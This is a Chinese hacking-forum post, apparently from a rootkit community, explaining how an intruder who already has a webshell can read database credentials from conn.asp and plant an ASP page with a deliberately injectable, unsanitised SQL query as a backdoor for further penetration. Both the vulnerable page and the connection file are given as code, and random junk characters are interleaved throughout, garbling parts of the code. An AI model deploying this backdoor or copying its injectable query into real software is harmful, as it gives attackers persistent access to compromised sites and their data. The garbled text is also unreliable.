自己构造注入点方便入侵
$ E/ s7 R9 {9 r# m& n$ g
% F! T( Q6 T8 w; H4 p3 L" s今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
* R S1 V2 D' s% v4 C$ ]8 J7 U+ n7 U9 E
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
9 q9 W& z# w* a, j, f) A4 x s$ R* Y3 x6 S0 H
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
6 i4 [+ I: e2 u, S' \" B/ c' |1 H9 |, D+ }
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
$ g; z, P2 b5 |# e! w5 k W; i+ i; z d+ G: u
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下: @8 L) j$ g! i) U6 f; s
1 K9 V: u; H$ s1 b& F. o3 K
程序代码
) b% X& C( v9 z: v. @' q<!--#include file="xx.asp"-->$ L0 m3 u1 [4 D0 j( b6 I8 Q
<%
* t/ i7 i+ ?* p3 t( a+ A( ?) U+ iset rs=server.createobject("ADODB.recordset")
B4 B# M/ K6 Y2 P7 j) Hid = request("id")
+ B8 O& e. X- A2 cstrSQL = "select * from admin where id=" & id
# C9 v2 E; s9 J' d: ~( C: K/ ors.open strSQL,conn,1,3
& X5 L7 ~ t+ |5 k2 brs.close8 b) Z5 n' r6 F/ v
%>- z' X/ v2 r9 J/ `* _; h
0 o9 T# o9 W5 t, X. A把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在; L* ~/ o* |1 C
^4 z! r( T& r2 [# I7 V, b( j9 Q
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!' ?8 h- k7 b% X
[) b8 e% Y1 Q
然后就要构造一个连接数据库的文件了,代码如下:
& O2 f, I( P" n: m0 m9 k程序代码
7 N8 r1 \3 |& a$ R- i! H! Y; _<% ( ?9 p# v% y. f* |1 U. `
strSQLServerName = "000.000.000.000" '服务器名称或地址
6 |- g: z$ j v3 m; fstrSQLDBUserName = "sqlname" '数据库帐号* K9 O7 X; g8 P" l$ N* i3 C
strSQLDBPassword = "sqlpass" '数据库密码
8 s0 l- S) Y+ V0 KstrSQLDBName = "sqldataname" '数据库名称* p- M; Q- |' @+ j& L6 I
Set conn = Server.CreateObject("ADODB.Connection")
) W, v! s+ m* g% d$ M7 x1 | ystrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
2 v9 U2 e, R4 ^! _" s6 }conn.open strCon
+ F" w/ v0 A8 H. u7 k%>
$ r+ b* ~" ]9 v2 P* u/ R+ z; w3 Q& b: }' Z- U4 A8 V# N
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
' y* K7 K; ^$ ^- z
5 E# \6 {& @4 b就这样,正常情况下,就OK了,伪造成功……
5 T2 y* d0 y" ~2 A: S' g: n. v1 P8 H, i
如果有什么问题可以提出来大家一起探讨解决。 |